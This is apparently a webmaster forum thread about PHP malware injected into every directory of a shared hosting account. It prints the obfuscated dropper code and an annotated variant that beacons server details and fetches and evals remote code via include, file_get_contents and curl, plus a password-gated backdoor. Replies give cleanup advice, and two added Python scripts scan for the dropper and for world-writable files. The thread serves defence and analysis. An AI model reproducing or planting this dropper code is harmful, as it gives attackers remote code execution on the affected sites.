
Security issue! Site files got injected! Please help.

owntype

I didn't find a sub-forum section to post questions regarding hosting/site security, so I have to post here.

I found that every directory in my shared hosting accounts has the following 2 files:

1. A random-numbers .php file, like 121521.php, containing this code:

PHP:
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){}
else
{include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}


2. .htaccess

Options -MultiViews
ErrorDocument 404 //rootdir/sales/0309/0309/121521.php

I have searched on Google and found many threads regarding this issue. Those codes are injected via open-source scripts like phpBB, WordPress, etc. After one site is injected, it can inject all sites under the same hosting server.

All the encoded code refers to sites like phptags.ws that benefit from the traffic of injected sites. So I have the following questions:

1. What's the aim of these codes?

2. Any direct attack to my sites and hosting accounts? e.g. the hacker knows all my login username/password and mysql info?

3. Should I delete all those files one by one, and what should I do before deleting them (because they may be produced again)?

4. Apart from the .htaccess and numbers.php files, are there any other files that have been injected?

Thanks!
Basically this code will try to include a remote file (obfuscated with the base64 function).
You can decode base64 strings: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx
For example:
aHR0cDovLw==
bdahbzzazbzgh
LnVzZXJzLnBocGluY2x1ZGUucnU=

=> http://bdahbzzazbzgh.users.phpinclude.ru/
I don't know what is in the remote include file though. Most likely it's taking a note of your server URL and sending a recap E-mail to the hacker :sick:

You should definitely fix the .htaccess file and remove the PHP files, as they could serve as a trojan to your system. That means the hacker could browse the files and directories on your system, extract passwords from config files, etc.
Most likely you have a third-party app like WordPress that is vulnerable. Make sure you upgrade your apps to the latest version.
That's all I can say right now.
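As an added example that is not from the thread or from either poster: a small Python scanner for the two injected files described above (a numeric-named .php file that silences errors, decodes base64 literals and pulls in remote code, plus an .htaccess whose ErrorDocument points at a .php file). It also decodes the base64 literals so you can read which host the dropper reports to, which is the manual decoding step described in the reply. The sample tree it builds is constructed for the demo: the host pieces are the placeholders "example" and ".invalid", not the real ones from the thread.

```python
import base64
import os
import re
import shutil
import tempfile

# PHP literal passed to base64_decode("..."), e.g. base64_decode("aHR0cDovLw==")
B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# Calls the dropper uses to fetch and run remote code
REMOTE_CALLS = ("include_once(", "include(", "file_get_contents(", "curl_init(", "eval(")
# .htaccess line of the form: ErrorDocument 404 /some/dir/121521.php
ERRORDOC_PHP = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+(\S+\.php)\s*$', re.MULTILINE)


def decode_literals(php_source):
    """Decode every base64_decode("...") literal found in PHP source text."""
    decoded = []
    for literal in B64_CALL.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable>")
    return decoded


def looks_like_dropper(php_source):
    """Heuristic matching the injected file: errors silenced, base64 literals,
    and at least one call that pulls in remote code."""
    silenced = "error_reporting(0)" in php_source
    has_b64 = B64_CALL.search(php_source) is not None
    has_remote = any(call in php_source for call in REMOTE_CALLS)
    return silenced and has_b64 and has_remote


def scan_tree(root):
    """Walk a web root and return (path, finding) pairs worth a closer look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                for target in ERRORDOC_PHP.findall(text):
                    findings.append((path, "ErrorDocument handler points at PHP: " + target))
            elif name.endswith(".php"):
                if re.fullmatch(r"\d+\.php", name):
                    findings.append((path, "numeric-only PHP filename"))
                if looks_like_dropper(text):
                    findings.append((path, "remote include dropper; decoded literals: "
                                     + ", ".join(decode_literals(text))))
    return findings


def build_sample_tree():
    """Constructed sample tree (not real data): a defanged stand-in for the injected
    121521.php, its .htaccess, and a harmless index.php. Host pieces are the
    placeholders 'example' + '.invalid' (base64 'LmludmFsaWQ=' is '.invalid')."""
    root = tempfile.mkdtemp(prefix="inject-scan-")
    site = os.path.join(root, "sales", "0309")
    os.makedirs(site)
    dropper = ('error_reporting(0);$s=base64_encode($_SERVER["HTTP_HOST"]);'
               'include_once(base64_decode("aHR0cDovLw==")."example"'
               '.base64_decode("LmludmFsaWQ=")."/?".$s);')
    with open(os.path.join(site, "121521.php"), "w") as fh:
        fh.write(dropper)
    with open(os.path.join(site, ".htaccess"), "w") as fh:
        fh.write("Options -MultiViews\nErrorDocument 404 /sales/0309/121521.php\n")
    with open(os.path.join(site, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return root


def demo():
    """Build the sample tree, scan it, clean up, and return the findings (sorted)."""
    root = build_sample_tree()
    try:
        return sorted(finding for _path, finding in scan_tree(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a copy of the account's web root (`scan_tree("/path/to/copy")`) rather than the live tree, and treat the output as a list of files to inspect, not as proof that everything else is clean: the heuristic only knows the shape of this particular dropper.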
Thank you, SDSINC! Do you think such injections can have access to my hosting/FTP/MySQL account info? Please refer to the following thread. Thanks!

I found the following thread, where all the code got annotated:
http://webmasterhotspot.com/index.php?showtopic=7792


PHP:
<?

error_reporting(0); // Turns off error throwing

// Gathers tracking information

$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);

// encodes tracking information for usage in a URL

$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);

// sets $f to 'phpsearch.cn'

$f=base64_decode("cGhwc2VhcmNoLmNu");

// I haven't been able to decode this MD5, but it replaces $f with
// any given URL when given an unknown password with this MD5 signature.

if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="face2bea501b7adcd7c09b627f443523")

$f=$_REQUEST["id"];

// It tries to use includes to call
// http://ads.phpsearch.cn/[tracking information]

if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));

// If the include didn't work,
// it tries to use file wrappers to call
// http://7.phpsearch.cn/[tracking information]

else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);

// If neither the include nor the file wrappers work,
// it tries to use CURL to call
// http://71.phpsearch.cn/[tracking information]

else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};

// all these methods will execute the contents of the first successful request.
// currently, all this does is display a 404 page

?>

Also, I saw from that thread that the hosting provider has processed a server-wide deletion of those files. Hopefully my hosting service provider can do the same; otherwise it would be a tough and boring process to remove them manually.

:(
You have or had a vulnerability somewhere on your site. The attackers could have modified any file on your account. I would recommend deleting all files in your account. Do not take backups of what is already there since you may contaminate your own machine (you did keep your own backups didn't you?). Your MySQL databases may be safe, but if you can restore them from an old backup I would do so. If possible get your host to remove the entire account and recreate it. They should be willing to do that to protect their servers.

The attackers may have your MySQL password. Change this. It is unlikely that they have your FTP password, but it wouldn't hurt to change it.

Once you've done this, restore your site, installing the latest versions of any scripts you were using. Make sure that you do not have any world writable directories ("chmod 777" directories).
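As an added example that is not part of the reply above: a Python check for the last point, world-writable ("chmod 777") directories and files, with a report of the tighter mode to apply. The sample tree in `demo()` is constructed for the demo (an upload directory left at 0777 and a config file at 0666); the real check is `tighten("/path/to/webroot")`, and `apply=True` makes it chmod the entries it reports.

```python
import os
import shutil
import stat
import tempfile


def world_writable(root):
    """Return (path, mode) for every file or directory under root whose
    permission bits grant write access to 'other' (o+w, e.g. chmod 777 / 666)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                 # do not follow symlinks
            if stat.S_ISLNK(st.st_mode):        # a symlink's own mode is meaningless here
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                hits.append((path, mode))
    return hits


def suggested_mode(mode):
    """Strip group and other write bits: 0o777 -> 0o755, 0o666 -> 0o644."""
    return mode & ~(stat.S_IWGRP | stat.S_IWOTH)


def tighten(root, apply=False):
    """Report, and optionally fix, world-writable entries under root.
    Returns sorted rows of (relative path, current mode, suggested mode)."""
    rows = []
    for path, mode in world_writable(root):
        new_mode = suggested_mode(mode)
        rows.append((os.path.relpath(path, root), oct(mode), oct(new_mode)))
        if apply:
            os.chmod(path, new_mode)
    return sorted(rows)


def demo():
    """Constructed sample tree (not real data): a chmod 777 upload dir, a sane
    0755 dir, and a 0666 config file. Returns (report before fixing, hits after
    fixing) and removes the tree afterwards."""
    root = tempfile.mkdtemp(prefix="perm-check-")
    try:
        uploads = os.path.join(root, "uploads")
        includes = os.path.join(root, "includes")
        os.makedirs(uploads)
        os.makedirs(includes)
        os.chmod(uploads, 0o777)
        os.chmod(includes, 0o755)
        cfg = os.path.join(includes, "config.php")
        with open(cfg, "w") as fh:
            fh.write("<?php $db_pass = 'placeholder'; ?>\n")
        os.chmod(cfg, 0o666)
        before = tighten(root)
        tighten(root, apply=True)
        after = world_writable(root)
        return before, after
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    report, remaining = demo()
    for row in report:
        print("%-25s %s -> %s" % row)
    print("world-writable entries left:", len(remaining))
```

Some applications genuinely need a writable upload directory; in that case the directory should be writable by the web server's user or group only, never by everyone, and PHP execution should be disabled in it.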
Thank you, gbert220!! Appreciate it!